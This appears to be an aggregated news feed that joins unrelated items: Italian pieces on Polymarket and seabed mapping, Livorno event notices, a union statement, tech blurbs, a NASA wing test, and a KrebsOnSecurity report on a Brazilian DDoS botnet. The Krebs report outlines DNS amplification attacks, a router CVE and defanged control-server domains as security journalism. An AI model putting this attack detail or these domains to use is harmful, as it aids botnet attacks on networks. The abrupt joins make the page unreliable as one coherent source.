La destituzione di Maduro, l’attacco all’Iran e le anticipazioni di tanti degli eventi che hanno segnato gli ultimi mesi hanno messo in allerta esponenti della politica ed esperti di sicurezza, convincendoli che i mercati predittivi possano essere terreno fertile per l’insider trading. A ulteriore conferma di questa ipotesi arriva uno studio elaborato da un gruppo di ricercatori dell’Università di Harvard, che hanno stimato vittorie pari a 143 milioni di dollari per i trader che hanno scommesso cifre notevoli su Polymarket perché in possesso di informazioni riservate su un’ampia varietà di eventi, dal fidanzamento di Taylor Swift al vincitore del Premio Nobel per la Pace.
Non stupisce, quindi, che di recente il deputato democratico Ritchie Torres abbia inviato una comunicazione alla Commodity Futures Trading Commission (CFTC) per chiedere di indagare sulle scommesse fatte dagli investitori a pochi minuti dall’inizio degli eventi. “Questo schema solleva serie preoccupazioni sul fatto che alcuni operatori di mercato possano aver avuto accesso a informazioni rilevanti e non di dominio pubblico, relative a un evento geopolitico in grado di influenzare il mercato”, ha scritto Torres nella lettera condivisa con l’Associated Press, chiedendo pubblicamente: “Qual è la probabilità statistica che qualcuno che non sia un insider trader piazzi una scommessa vincente 12 minuti prima di un annuncio presidenziale in grado di influenzare i mercati?”.
A preoccupare, però, non è soltanto il fenomeno dell’insider trading. Giorno dopo giorno, ora dopo ora, Polymarket si riempie di informazioni predittive sulle operazioni dei governi più potenti al mondo, rappresentando un’enorme minaccia alla loro sicurezza. “Polymarket è diventato un mercato illecito per vendere e speculare su segreti di sicurezza nazionale senza precedenti nella storia e, di conseguenza, una potenziale fonte di informazioni per i servizi di intelligence stranieri che tengono d’occhio quelle stesse scommesse sospette”, ha commentato il senatore democratico Richard Blumenthal, seguito dal deputato repubblicano Blake Moore, che ha dichiarato di non voler neppure “immaginare un mondo in cui gli avversari dell’America utilizzino i mercati predittivi per anticipare la nostra prossima mossa”.
La preoccupazione per la sicurezza del paese, quindi, sembra accomunare democratici e repubblicani, anche se non si può certo dire lo stesso dell’insider trading. Su quest’ultimo fronte, infatti, sono soprattutto i democratici a essersi esposti, avanzando proposte di legge che vietino ai funzionari governativi di scommettere su eventi di cui conoscono dettagli altamente riservati. Normative che, molto probabilmente, non saranno approvate, considerando il forte legame tra l’amministrazione Trump e i mercativi predittivi. Come anticipato, Donald Trump Jr. è investitore e consulente di Polymarket, oltre che uno dei consulenti del suo diretto competitor di settore, Kalshi. E lo stesso presidente degli Stati Uniti sembra avere un interesse per i mercati predittivi, come dimostrato dal progetto annunciato dall’agenzia mediatica di famiglia, di cui Donald Trump Jr. è amministratore: il mercato predittivo Truth Predictive.
“Donald Trump e la sua famiglia sono completamente coinvolti e guadagnano da Kalshi e Polymarket”, ha commentato il senatore democratico Chris Murphy, confermando il forte legame tra il governo statunitense e le piattaforme. Eppure, secondo quanto riferito dal Wall Street Journal, mentre le operazioni in Iran erano ancora in corso la Casa Bianca ha inviato un’email a tutti i funzionari governativi, invitandoli a non utilizzare le informazioni in loro possesso per piazzare scommesse nei mercati predittivi.
Una mossa che, a detta di alcuni, potrebbe essere servita a nascondere la predilezione del presidente per Polymarket e Kalshi, indissolubilmente legate al suo figlio maggiore, che in più di un’occasione ha preso le distanze dalle accuse di corruzione mosse contro di lui. Anche Andrew Surabian, portavoce di Donald Trump Jr., ha ribadito che il suo unico coinvolgimento nei mercati di previsione consiste nel fornire consulenza a Kalshi e Polymarket sulle strategie di marketing, e nel sostenere finanziariamente Polymarket, aggiungendo che non entra mai in contatto con il governo federale per conto delle società in cui ha investito o di cui è consulente. Ma nessuna di queste affermazioni, a quanto pare, è riuscita a placare le perplessità sulle puntate di investitori anonimi sugli eventi geopolitici che, fino a ora, hanno contraddistinto l’amministrazione Trump.
L'articolo Polymarket e i pericoli dei mercati predittivi proviene da Guerre di Rete.
Martedì 12 maggio 2026, ore 17.00
Edificio dell’Orologio, Piazza Luigi Orlando – Livorno- Nuova sede di ISTORECO
Livorno, maggio 1849. Le truppe austro-estensi entrano in città dopo due giorni di assedio, mettendo fine a una resistenza tenace e simbolica. Per i vincitori, comincia allora la parte più difficile: ricostruire un ordine politico che la rivoluzione ha frantumato nel profondo.
È questo il territorio inesplorato al cuore del libro di Giacomo Zanasi, un lavoro documentato e originale che sceglie di andare controcorrente: anziché raccontare la rivoluzione, ne segue il soffocamento. Anziché dare voce ai rivoltosi sulle barricate, assume il punto di vista di chi doveva riportare l’ordine – funzionari, autorità, occupanti – e si trova a fare i conti con una città che non dimentica e non perdona.
Tra processi politici, arresti di massa, esuli in fuga verso la Corsica e una prima amnistia a novembre, «Li tiranni di quella fazione» ricostruisce come Livorno – la città più radicale del Granducato, la più politicizzata, la più refrattaria allo status quo – sia diventata un laboratorio della seconda Restaurazione. E come il lungo Quarantotto abbia lasciato un segno indelebile nella vita di una comunità intera, dividendola lungo linee di frattura che non si sarebbero più del tutto richiuse.
Interverranno:
Catia Sonetti, Direttrice ISTORECO Livorno (introduce e coordina)
Marco Manfredi, Università di Pisa
Giacomo Zanasi, Università di Salerno
La pubblicazione è stata realizzata grazie al contributo della Direzione Generale Educazione, Ricerca e Istituti Culturali del Ministero della Cultura.
Lunedì 11 maggio 2026, ore 17.00 Edificio dell’Orologio – Piazza Luigi Orlando, Livorno- Nuova sede di ISTORECO
Roma fu liberata il 4 giugno. Lo sbarco in Normandia due giorni dopo. L’estate del 1944 sembrava annunciare la fine imminente della guerra. Poi, invece, arrivarono i mesi di stallo.
L’offensiva alleata si arenò ai piedi della Linea Gotica. I partigiani dovettero abbandonare le montagne. Il proclama Alexander ordinò, di fatto, la sospensione della lotta armata. Per chi combatteva, per chi si nascondeva, per chi sperava soltanto di sopravvivere, il 1944 fu un anno che sembrò non finire mai.
Eppure questo anno cruciale è rimasto a lungo in ombra nella nostra memoria collettiva, schiacciato tra il trauma dell’armistizio del 1943 e i fuochi della Liberazione del 1945. Il libro 1944: L’anno prima della fine della guerra lo riporta al centro della scena, con gli occhi e le voci di una nuova generazione di storici.
Sedici saggi che riassumono tre prospettive: gli Alleati, con la loro babele di lingue, culture e pratiche; gli occupanti e i resistenti, con le loro paure e le speranze di un mondo in bilico; la transizione verso il dopoguerra, con le memorie e i tentativi – spesso falliti — di fare i conti con il passato.
Un libro che non si accontenta di raccontare battaglie e date, ma tenta di restituire i timori e le emozioni sul futuro, dell’Italia e di chi quella guerra la stava vivendo sulla propria pelle.
Ne discuteranno con due dei curatori Gianluca Fulvetti (Università di Pisa) e Francesco Fusi (ISRT), Federico Creatini (Università della Calabria) e Nicoletta Arena (Università di Firenze). Coordina Giovanni Brunetti (ISTORECO).
This month we explore Zenclora OS 2.0, MocaccinoOS 26.03, NebiOS 10.2, and CachyOS 260308.
Ghost is a powerful CMS for beginners and professionals who want to grow a business around their content.
Corporate communication platforms might be convenient, but they put your privacy at risk. The Matrix open communication standard offers a different approach.
This month we explore the top FOSS, including the ultimate FTP client, a 6502 Assembly Environment, and open source levels for Doom.
As I write this, the San Francisco Superior Court has denied Amazon's motion for a summary judgment on a claim in its defense of a State of California lawsuit alleging anticompetitive behavior.
If you're operating a large collection of Linux servers, OpenSCAP can help with regular auditing and system hardening.
Run your own machine translation service with Argos Translate and LibreTranslate.
Fake cryptocurrency wallets in the Snap Store have cost users hundreds of thousands of dollars. A community project aims to create more transparency for Snap package users.
With memcached, you can establish communication between Arduinos, Pi Picos, handhelds, and other small microcontrollers.
Linkwarden lets you bookmark interesting web pages and saves copies in case the originals disappear.
Recent legislative bills put the burden of restricting minor use of technology onto operating systems, which has potential issues.
Turn your Raspberry Pi 500 into an Amiga 500 with the Pimiga 5 Amiga emulator and gain access to a huge selection of Amiga games, demos, and applications.
Linux users associate open source licenses with software, but a bevy of licenses are available for documents, images, audio/video, fonts, and hardware.
To impress his WhatsApp friends, Mike Schilli builds a chatbot in Go that contacts OpenAI on demand and provides answers.
Use qrcp and Warp to move files effortlessly between your Linux computer, your phone, and even remote systems, minus an account, cables, or network wrangling.
USB, nell’ambito delle attività dello sportello dedicato alla prevenzione e al contrasto delle discriminazioni di genere nei luoghi di lavoro, intende portare all’attenzione pubblica e delle istituzioni competenti una vicenda che presenta rilevanti profili di possibile discriminazione indiretta legata al genere e vittimizzazione secondaria.
La situazione riguarda una lavoratrice impiegata in somministrazione con contratto a tempo determinato, recentemente giunto a scadenza senza rinnovo. Nel corso del rapporto di lavoro, la lavoratrice ha vissuto una condizione di particolare vulnerabilità in quanto vittima di violenza domestica, circostanza che ha inciso profondamente sulla sua condizione personale e lavorativa. Tale contesto era stato rappresentato all’Azienda utilizzatrice, Bertani Trasporti S.p.A., sia attraverso i responsabili di sito sia mediante interlocuzioni con le risorse umane, evidenziando come le assenze maturate fossero strettamente connesse agli effetti fisici e psicologici della violenza subita e alla necessità di adempiere a inderogabili impegni di natura legale.
Prima della scadenza contrattuale, USB e RETE ISIDE, attraverso lo Sportello contro le molestie, discriminazioni e violenza di genere nei luoghi di lavoro hanno formalmente segnalato a Bertani Trasporti la possibile sussistenza di un profilo discriminatorio connesso alla condizione della lavoratrice. Nonostante ciò, il rapporto di lavoro non è stato rinnovato. Nel riscontro fornito, l’Azienda ha ricondotto la decisione all’applicazione di criteri ritenuti oggettivi e uniformi, tra i quali la continuità della prestazione lavorativa.
Riteniamo che questo non sia assolutamente sufficiente ad escludere possibili profili di criticità. L’applicazione di un criterio apparentemente neutro come quello della continuità della prestazione, in assenza di una valutazione sostanziale delle cause delle assenze, rischia infatti di produrre un effetto sproporzionatamente sfavorevole nei confronti di una lavoratrice la cui condizione è direttamente riconducibile a una situazione di violenza di genere già portata all’attenzione aziendale. In questo senso, la vicenda si presta a essere letta alla luce della nozione di discriminazione indiretta, oltre che sotto il profilo della possibile vittimizzazione secondaria, laddove una decisione organizzativa finisca per aggravare le conseguenze di una condizione di vulnerabilità già esistente.
A ciò si aggiunge il fatto che la lavoratrice è inserita in un nucleo monogenitoriale e sostiene in via esclusiva i carichi di cura familiare. Tale circostanza, che avrebbe richiesto una valutazione attenta e sostanziale nell’ambito delle decisioni organizzative e contrattuali, non risulta essere stata adeguatamente considerata. Anche sotto questo profilo, l’applicazione rigida di criteri formali rischia di tradursi in un trattamento penalizzante, in contrasto con i principi di tutela della genitorialità e di conciliazione tra vita lavorativa e familiare sanciti dall’ordinamento.
Riteniamo fondamentale una concreta attenzione alle condizioni reali delle lavoratrici, in particolare di quelle che subiscono violenza, sia nei contesti domestici sia nei luoghi di lavoro, che non può limitarsi a un approccio formale, ma deve necessariamente passare attraverso il riconoscimento della complessità delle situazioni individuali, delle condizioni materiali di vita e delle dinamiche strutturali che incidono sulle possibilità di autodeterminazione.
Il fatto si inserisce, non a caso, in un contesto caratterizzato da precarietà e subalternità. Si tratta di una lavoratrice in somministrazione, dunque appartenente a una delle categorie meno tutelate e maggiormente esposte a forme di ricattabilità e sfruttamento. Il settore in cui è impiegata, quello della logistica, è storicamente costruito su un sistema di appalti e subappalti che tende a frammentare i rapporti di lavoro e a scaricare i costi sulla forza lavoro, alimentando condizioni di instabilità occupazionale, bassi salari e organizzazioni del lavoro spesso incompatibili con i tempi di vita.
Questo modello produttivo, fondato sul contenimento dei costi e sull’esternalizzazione, si traduce sistematicamente nell’abbassamento delle tutele e nella compressione dei diritti, incidendo in maniera particolarmente significativa sulle lavoratrici, soprattutto quando già esposte a condizioni di vulnerabilità. In tale contesto, il rischio di discriminazioni, anche indirette, si amplifica e si intreccia con dinamiche strutturali di disuguaglianza.
Per queste ragioni, USB ha ritenuto doveroso trasmettere formale segnalazione alle istituzioni competenti, in primis la Consigliera di Parità provinciale, la Vicesindaca con delega alle Pari Opportunità, ma anche il Sindaco e il Prefetto, attori che hanno recentemente sottoscritto il Manifesto per il lavoro buono, impegnandosi a promuovere un modello di lavoro inclusivo e attento alla tutela della dignità delle persone.
La vicenda descritta appare infatti difficilmente conciliabile con i principi affermati sia dalla normativa nazionale e sovranazionale in materia di pari opportunità e contrasto alla discriminazione, sia con gli impegni pubblicamente assunti attraverso la sottoscrizione del Manifesto. Proprio per questo è importante che sia posta all’attenzione delle istituzioni pubbliche e dell’opinione pubblica , affinché vengano approfonditi tutti gli elementi rilevanti e, ove ne ricorrano i presupposti, adottate le iniziative più idonee a garantire una piena tutela dei diritti della lavoratrice e a prevenire il ripetersi di situazioni analoghe, sia all’interno di Bertani Trasporti S.p.A. sia, più in generale, nelle aziende operanti nel settore della logistica e negli altri contesti produttivi.
USB - Sportello contro le molestie, le discriminazioni e la violenza d genere nei luoghi di lavoro
Lunedì 4 Maggio le realtà cittadine che compongono la rete di solidarietà per la Palestina, hanno lanciato un presidio davanti al consolato onorario della Grecia in via Fagiuoli 1. Successivamente ci sposteremo davanti all Prefettura.
Chiediamo un intervento deciso del Governo Italiano a tutela degli attivisti e attiviste della Global Sumud Flotilla. Chiediamo l'immediata liberazione di Thiago e Saif, dopo il rapimento illegale da parte di Israele.
Tra i partecipanti alla missione ci sono anche 4 attivisti livornesi.
Ex Caserma Occupata, gruppo autonomo portuali, USB, collettivo studentesco Scuola di Carta, Potere al Popolo, Teatro Refugio, Associazione Livorno Palestina, Coordinamento Antimilitarista saranno in piazza e invitano la città di Livorno a mobilitarsi per l'interruzione dei rapporti con Israele. Sanzioni e embargo immediato. Per la liberazione di tutti i prigionieri.
Martedì 5 maggio è previsto lo sciopero regionale dei lavoratori RFI. Con manifestazione, dalle ore 10, davanti alla Prefettura di Firenze.
Sciopero proclamato per l'intera prestazione.
Per la sicurezza sul lavoro e contro l'utilizzo bellico della rete ferroviaria.
Giovedì 7 Maggio. Sciopero nazionale dei Portuali. Per il riconoscimento del lavoro usurante ai fini pensionistici e contro l'utilizzo delle risorse pubbliche per i piani di riarmo. Contro l'aumento dei prezzi e inflazione alle stelle, servono meccanismi automatici di tutela dei salari e delle pensioni. Basta destinare miliardi di euro in armi invece che nei servizi pubblici.
Una delegazione di portuali Livornesi parteciperà alla Manifestazione davanti al Ministero del Lavoro a Roma.
Il 7 Maggio è previsto anche lo sciopero nazionale della scuola. Studenti e lavoratori scenderanno in piazza contro la reintroduzione della leva militare e per opporsi alla riforma classista degli istituti tecnici
A Livorno il collettivo studentesco Scuola di Carta ha lanciato una manifestazione. Dalle ore 9 in Piazza Cavour. USB sarà presente!
Invitiamo gli iscritti e le iscritte, i lavoratori e le lavoratrici a mobilitarsi, scioperare e scendere in piazza.
Prepariamoci per la manifestazione nazionale a Roma del 23 maggio.
L'articolo Software per prenotazioni ristoranti senza intermediazione: quali scegliere e cosa valutare proviene da FullPress.
The initial injustice of proprietary software often leads to further injustices: malicious functionalities.
The introduction of unjust techniques in nonfree software, such as back doors, DRM, tethering, and others, has become ever more frequent. Nowadays, it is standard practice.
We at the GNU Project show examples of malware that has been introduced in a wide variety of products and dis-services people use everyday, and of companies that make use of these techniques.
GNU Health at the Cyber|Show!
Grab a coffee and listen to the 40 min. interview Andy Farnell and Helen Plews made to Luis Falcón in their wonderful show. ❤️
They covered key aspects on citizen and patient data privacy, hospital management, federated health networks, genomics and wearables. In the interview they also talked about the risks associated to commercial, closed sourced electronic health records systems and proprietary mobile applications.
The interview reveals how crucial is Free/Libre software for equity and digital sovereignty in our societies. 🩺 🏥 🧬 👇️
https://cybershow ... pisodes.php?id=64
About Cyber|Show:
https://cybers ... w.uk/about.php
Get this and latest news about GNU Health from our official Mastodon account:
https://mastodon. ... social/@gnuhealth
Tags: #GNUHealth #GNU #OpenScience #PublicHealth #Privacy #FreeSoftware #SocialMedicine #CyberShow
A Brazilian tech firm that specializes in protecting networks from distributed denial-of-service (DDoS) attacks has been enabling a botnet responsible for an extended campaign of massive DDoS attacks against other network operators in Brazil, KrebsOnSecurity has learned. The firm’s chief executive says the malicious activity resulted from a security breach and was likely the work of a competitor trying to tarnish his company’s public image.
An Archer AX21 router from TP-Link. Image: tp-link.com.
For the past several years, security experts have tracked a series of massive DDoS attacks originating from Brazil and solely targeting Brazilian ISPs. Until recently, it was less than clear who or what was behind these digital sieges. That changed earlier this month when a trusted source who asked to remain anonymous shared a curious file archive that was exposed in an open directory online.
The exposed archive contained several Portuguese-language malicious programs written in Python. It also included the private SSH authentication keys belonging to the CEO of Huge Networks, a Brazilian ISP that primarily offers DDoS protection to other Brazilian network operators.
Founded in Miami, Fla. in 2014, Huge Networks’s operations are centered in Brazil. The company originated from protecting game servers against DDoS attacks and evolved into an ISP-focused DDoS mitigation provider. It does not appear in any public abuse complaints and is not associated with any known DDoS-for-hire services.
Nevertheless, the exposed archive shows that a Brazil-based threat actor maintained root access to Huge Networks infrastructure and built a powerful DDoS botnet by routinely mass-scanning the Internet for insecure Internet routers and unmanaged domain name system (DNS) servers on the Web that could be enlisted in attacks.
DNS is what allows Internet users to reach websites by typing familiar domain names instead of the associated IP addresses. Ideally, DNS servers only provide answers to machines within a trusted domain. But so-called “DNS reflection” attacks rely on DNS servers that are (mis)configured to accept queries from anywhere on the Web. Attackers can send spoofed DNS queries to these servers so that the request appears to come from the target’s network. That way, when the DNS servers respond, they reply to the spoofed (targeted) address.
By taking advantage of an extension to the DNS protocol that enables large DNS messages, botmasters can dramatically boost the size and impact of a reflection attack — crafting DNS queries so that the responses are much bigger than the requests. For example, an attacker could compose a DNS request of less than 100 bytes, prompting a response that is 60-70 times as large. This amplification effect is especially pronounced when the perpetrators can query many DNS servers with these spoofed requests from tens of thousands of compromised devices simultaneously.
A DNS amplification and reflection attack, illustrated. Image: veracara.digicert.com.
The exposed file archive includes a command-line history showing exactly how this attacker built and maintained a powerful botnet by scouring the Internet for TP-Link Archer AX21 routers. Specifically, the botnet seeks out TP-Link devices that remain vulnerable to CVE-2023-1389, an unauthenticated command injection vulnerability that was patched back in April 2023.
Malicious domains in the exposed Python attack scripts included DNS lookups for hikylover[.]st, and c.loyaltyservices[.]lol, both domains that have been flagged in the past year as control servers for an Internet of Things (IoT) botnet powered by a Mirai malware variant.
The leaked archive shows the botmaster coordinated their scanning from a Digital Ocean server that has been flagged for abusive activity hundreds of times in the past year. The Python scripts invoke multiple Internet addresses assigned to Huge Networks that were used to identify targets and execute DDoS campaigns. The attacks were strictly limited to Brazilian IP address ranges, and the scripts show that each selected IP address prefix was attacked for 10-60 seconds with four parallel processes per host before the botnet moved on to the next target.
The archive also shows these malicious Python scripts relied on private SSH keys belonging to Huge Networks’s CEO, Erick Nascimento. Reached for comment about the files, Mr. Nascimento said he did not write the attack programs and that he didn’t realize the extent of the DDoS campaigns until contacted by KrebsOnSecurity.
“We received and notified many Tier 1 upstreams regarding very very large DDoS attacks against small ISPs,” Nascimento said. “We didn’t dig deep enough at the time, and what you sent makes that clear.”
Nascimento said the unauthorized activity is likely related to a digital intrusion first detected in January 2026 that compromised two of the company’s development servers, as well as his personal SSH keys. But he said there’s no evidence those keys were used after January.
“We notified the team in writing the same day, wiped the boxes, and rotated keys,” Nascimento said, sharing a screenshot of a January 11 notification from Digital Ocean. “All documented internally.”
Mr. Nascimento said Huge Networks has since engaged a third-party network forensics firm to investigate further.
“Our working assessment so far is that this all started with a single internal compromise — one pivot point that gave the attacker downstream access to some resources, including a legacy personal droplet of mine,” he wrote.
“The compromise happened through a bastion/jump server that several people had access to,” Nascimento continued. “Digital Ocean flagged the droplet on January 11 — compromised due to a leaked SSH key, in their wording — I was traveling at the time and addressed it on return. That droplet was deprecated and destroyed, and it was never part of Huge Networks infrastructure.”
The malicious software that powers the botnet of TP-Link devices used in the DDoS attacks on Brazilian ISPs is based on Mirai, a malware strain that made its public debut in September 2016 by launching a then record-smashing DDoS attack that kept this website offline for four days. In January 2017, KrebsOnSecurity identified the Mirai authors as the co-owners of a DDoS mitigation firm that was using the botnet to attack gaming servers and scare up new clients.
In May 2025, KrebsOnSecurity was hit by another Mirai-based DDoS that Google called the largest attack it had ever mitigated. That report implicated a 20-something Brazilian man who was running a DDoS mitigation company as well as several DDoS-for-hire services that have since been seized by the FBI.
Nascimento flatly denied being involved in DDoS attacks against Brazilian operators to generate business for his company’s services.
“We don’t run DDoS attacks against Brazilian operators to sell protection,” Nascimento wrote in response to questions. “Our sales model is mostly inbound and through channel integrator, distributors, partners — not active prospecting based on market incidents. The targets in the scripts you received are small regional providers, the vast majority of which are neither in our customer base nor in our commercial pipeline — a fact verifiable through public sources like QRator.”
Nascimento maintains he has “strong evidence stored on the blockchain” that this was all done by a competitor. As for who that competitor might be, the CEO wouldn’t say.
“I would love to share this with you, but it could not be published as it would lose the surprise factor against my dishonest competitor,” he explained. “Coincidentally or not, your contact happened a week before an important event – one that this competitor has NEVER participated in (and it’s a traditional event in the sector). And this year, they will be participating. Strange, isn’t it?”
Strange indeed.
3 min read
NASA and Boeing have completed wind tunnel testing to study an innovative advanced aircraft design intended to improve aerodynamic efficiency.
A truss-braced wing configuration, involving a long, thin wing with aerodynamically shaped structural supports, has the potential to reduce fuel and operational costs for future airliners, which is why NASA has collaborated with Boeing to advance the design.
But this kind of wing would be much more than a simple tweak to existing designs – for an aircraft the size of a passenger jet, it would be a revolutionary redesign, requiring extensive study from NASA and Boeing.
The most recent round of testing used a complex wind tunnel model to collect data on how air flows around a truss-braced wing model and the forces that would be exerted on such a wing in flight.
The test used a semispan model – essentially half an aircraft mounted on a wind tunnel floor. The model has features built in to simulate the mechanisms that increase the amount of lift a wing produces. By adjusting the model’s slats, flaps, and other moving control surfaces, the team can configure it to the low speed, high-lift settings of takeoff and landing conditions.
The model is part of a collaboration to test what’s known as Boeing’s Subsonic Ultra Green Aircraft Research (SUGAR) concept.
In December, teams completed testing of the model wind tunnel operated by the company QinetiQ in Farnborough, England. This large wind tunnel uses pressurized conditions to predict airplane behavior in takeoff and landing conditions.
The large size of the tunnel gives the model fidelity to better predict the behavior of a plane in flight. This capability allowed the team to confidently assess aerodynamic performance.
NASA and Boeing research teams analyzed data in real time to ensure the model performed as expected. Researchers are still reviewing the full results, but the test has already added valuable information to a growing body of research aimed at reducing fuel use in future aircraft designs.
The testing was just the latest stop for this research. NASA and Boeing have tested the concept at multiple NASA facilities to collect data as they work to build a comprehensive understanding of this advanced airframe concept.
This collaboration serves as an example of how NASA serves as an incubator for breakthrough technology with profound commercial applications. The transonic truss-braced wing concept originated from NASA aeronautics-supported research and NASA and Boeing engineers have worked together, test-by-test, to move this wing design from an idea to a practical reality.
The work began in NASA’s Advanced Air Vehicles Program and continues as part of the Subsonic Flight Demonstrator project under the Integrated Aviation Systems Program in the agency’s Aeronautics Research Mission Directorate.
Immagine in evidenza da Rawpixel
La guerra in Iran ci ha ricordato quanto il mare sia cruciale per il funzionamento dell’economia globale. Era già accaduto due anni fa con il blocco di Suez e, ancor prima, con l’incidente della Ever Given nello stesso canale. Eventi diversi, ma accomunati dalla capacità di farci toccare con mano l’importanza delle rotte marittime.
Esiste tuttavia un’altra logistica marittima fondamentale, che scorre non sulla superficie degli oceani ma sui fondali. È una logistica per natura invisibile, fatta di cavi per la trasmissione di dati e di tubature per il trasporto di energia, ma essenziale quanto le rotte della logistica di superficie.
La cosa più sorprendente è però quanto poco ancora si sappia del luogo in cui questa rete si dipana. I fondali oceanici restano infatti uno degli ambienti meno osservati e compresi del pianeta. Per dare un’idea di quanto sia scarsa questa conoscenza, basti dire che, ancora nel pieno del XXI secolo, non è raro che vengano individuate montagne sottomarine in aree che si ritenevano già mappate.
La ragione della “nube di ignoranza” che ricopre tutto ciò che si trova al di sotto di una certa profondità delle acque è in primo luogo tecnologica. I sistemi che utilizziamo per osservare la superficie terrestre si basano sulla luce, che però penetra nell’acqua solo per poche centinaia di metri. Al di sotto di questa soglia – e considerando che le profondità oceaniche possono superare i 10mila metri – è necessario ricorrere ad altri strumenti. Il principale di questi è il sonar, che utilizza onde sonore per ricostruire la forma del fondale. Un metodo efficace, ma lento, costoso, legato alla presenza fisica di navi o piattaforme di rilevamento. Questo vincolo si riflette nei dati disponibili: ancora oggi, una parte significativa dei fondali non è stata mappata con standard moderni. E anche laddove i dati esistono, sono spesso frammentari e soprattutto non integrati tra loro.
Arrivati a questo punto ci si potrebbe porre una domanda: è davvero così importante sapere cosa si trova a migliaia di chilometri sotto il mare? La risposta è: sì, è sempre più importante per svariate ragioni. I motivi sono in primo luogo economici.
Il fondale marino, come detto, è una piattaforma su cui poggiano infrastrutture critiche globali. I cavi sottomarini trasportano oltre il 95% del traffico internet intercontinentale; le pipeline collegano giacimenti offshore ai sistemi energetici nazionali; nuove reti elettriche iniziano a connettere parchi eolici marini alla terraferma. Tutte queste infrastrutture devono essere progettate, installate e mantenute in ambienti complessi, dove la morfologia del fondale, la composizione dei sedimenti e le correnti possono fare la differenza tra stabilità e vulnerabilità.
C’è però un secondo livello, meno evidente ma ancora più strategico. Conoscere un fondale significa infatti comprendere come si comporta il suono sott’acqua. E questo, a sua volta, è un elemento cruciale per la guerra sottomarina. I sottomarini – per definizione progettati per risultare invisibili – dipendono dalla capacità di sfruttare le caratteristiche dell’ambiente per nascondersi o per individuare altri mezzi. Temperatura, salinità, correnti e conformazione del terreno influenzano la propagazione delle onde sonore e quindi l’efficacia dei sistemi sonar.
In altre parole, conoscere come è fatto un fondale significa poter operare meglio al suo interno, sia per attaccare sia per difendersi. Una volta che si comprende questo fatto fondamentale, si capisce anche perché la mappatura degli abissi sia recentemente diventata un ennesimo campo di competizione tra le due principali potenze della nostra epoca: Cina e Stati Uniti.
Come raccontato lo scorso marzo da un ampio e ben documentato articolo della Reuters, la più attiva in questo ambito, negli ultimi anni, è stata la Cina. A partire dal 2020, Pechino ha avviato un’attività di mappatura e monitoraggio dei fondali su una scala difficilmente comparabile con quella di altri attori. Navi da ricerca, istituti universitari e agenzie statali operano in modo coordinato in diverse aree del globo: Pacifico occidentale, Oceano Indiano, fino ad arrivare alle rotte artiche.
Formalmente, queste operazioni sono giustificate da obiettivi scientifici ed economici: studio dei fondali, ricerca di risorse, analisi climatica. In pratica, tuttavia, le attività di ricerca hanno caratteristiche che suggeriscono un uso duale dei dati ottenuti. Le traiettorie seguite dalle navi impiegate nella ricerca – spesso caratterizzate da movimenti ripetitivi e sistematici – sono infatti tipiche delle operazioni di mappatura ad alta risoluzione, il tipo di dato utile alle industrie della difesa.
Il progetto più ambizioso in questo ambito è definito “Transparent Ocean”: una rete di sensori e piattaforme in grado di fornire una visione il più possibile completa delle condizioni del mare in aree selezionate. L’obiettivo dichiarato è scientifico, ma le applicazioni militari sono evidenti. Per la Cina, la conoscenza del dominio sottomarino risponde infatti a una duplice esigenza strategica. Da un lato, migliorare l’impiego dei propri sottomarini, sfruttando le caratteristiche dell’ambiente per aumentare furtività ed efficacia. Dall’altro, sviluppare strumenti per individuare e tracciare quelli altrui, in particolare nelle aree considerate più sensibili, come la famigerata “prima catena di isole” (la fascia di arcipelaghi tra Giappone, Taiwan e Filippine che delimita l’accesso della Cina al Pacifico).
In questo senso, la mappatura dei fondali non è un’attività accessoria, ma una parte integrante dell’infrastruttura informativa della difesa marittima. Più che accumulare dati, si tratta di costruire un vantaggio conoscitivo che possa essere utilizzato in caso di crisi o conflitto. La scala e la continuità di questo sforzo suggeriscono che Pechino consideri il dominio sottomarino non come uno spazio da esplorare, ma come uno spazio da integrare stabilmente nella propria architettura strategica.
Sull’altro versante strategico e geografico del Pacifico troviamo gli Stati Uniti. Per decenni gli USA hanno beneficiato di un vantaggio significativo nella conoscenza degli oceani, costruito attraverso una combinazione di ricerca scientifica, capacità militari e infrastrutture tecnologiche. Questo vantaggio si è tradotto, tra le altre cose, in una superiorità nelle operazioni sottomarine che si è rivelata utile in diversi frangenti della Guerra Fredda.
Negli ultimi anni, tuttavia, questo quadro si è fatto più complesso. Da un lato, Washington ha lanciato iniziative ambiziose come la strategia NOMEC, con l’obiettivo di mappare le proprie acque entro il 2030-2040. Dall’altro, deve fare i conti con dati che mostrano come una parte rilevante (tra il 40 e il 50%) dei fondali statunitensi resti ancora poco conosciuta o mappata con tecnologie non aggiornate.
Il problema americano, a detta di un report del governo in merito, non è tanto la scarsità di dati o la capacità di generarli, quanto la loro frammentazione e la difficoltà di integrarli. Le informazioni “oceaniche” americane sono raccolte da attori diversi – agenzie civili, istituzioni scientifiche, marina militare – con finalità e standard differenti. Questo rende più difficile costruire un quadro unitario e aggiornato del dominio sottomarino nazionale.
Le ragioni per cui sia Cina che USA hanno iniziato a essere così preoccupate dalla loro scarsa conoscenza dei fondali è che, di recente, è cresciuta tanto l’importanza dei fondali quanto il numero delle minacce che operano in questo ambiente. Proprio come accade nel cielo, in fondo al mare oggi non si muovono solo colossi tecnologici da miliardi di dollari – come i sottomarini – ma anche droni subacquei a basso costo: piccoli dispositivi in grado di interferire con il regolare funzionamento di cavi o pipeline, e attraverso i quali vengono condotte operazioni di guerra ibrida di difficile attribuzione, soprattutto in assenza di un monitoraggio aggiornato e capillare.
È per questo che, a detta degli esperti, serve un ulteriore balzo tecnologico, non tanto nella capacità di raccogliere dati, quanto in quella di interpretarli e integrarli. Ed è qui che entra in gioco l’intelligenza artificiale. Gli algoritmi di deep learning possono riconoscere pattern nei segnali sonar, distinguere tra anomalie naturali e oggetti artificiali, aggiornare mappe quasi in tempo reale integrando dati raccolti da fonti diverse. In prospettiva, possono anche contribuire a prevedere comportamenti: come si muovono le correnti, come cambia la propagazione del suono, dove è più probabile che un oggetto non identificato stia operando.
In altre parole, le AI possono accelerare il passaggio in corso da una logica di “mappatura” dei fondali a una logica di “monitoraggio continuo”. Si tratta di un cambiamento che ha implicazioni profonde. Per esempio significa che la superiorità nel dominio strategico sottomarino non dipenderà più solo dal numero di navi o dalla qualità dei sottomarini, ma dalla capacità di costruire e gestire reti informative complesse. Significa anche che il confine tra ambito civile e militare diventa ancora più sfumato: gli stessi dati utilizzati per studiare gli ecosistemi marini o per progettare infrastrutture energetiche possono essere impiegati per finalità di sorveglianza e difesa.
